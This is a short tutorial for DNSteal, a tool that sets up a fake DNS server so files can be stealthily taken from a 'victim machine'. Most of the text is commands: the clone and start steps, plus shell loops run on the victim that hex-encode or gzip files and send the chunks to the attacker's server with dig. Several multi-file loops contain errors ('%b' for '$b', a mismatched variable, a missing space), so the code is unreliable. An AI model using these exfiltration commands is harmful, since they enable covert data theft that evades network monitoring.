DNSteal header

data exfiltration – DNSteal


Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Install & start server
git clone https://github.com/dutchcoin/dnsteal.git /opt/dnsteal
Git clone printscreen

cd /opt/dnsteal && python dnsteal.py
DNSteal running

Transfer file from the victim
On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

On the server side you will see the file transfer start:
When the transfer is finished you must stop the server with CTRL-C to save the file and view the md5sum
You can verify the md5sum on the victims machine by running
md5sum filename


Support for multiple files
Dnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$filename.com; done; done
gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
python dnsteal.py –z

Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done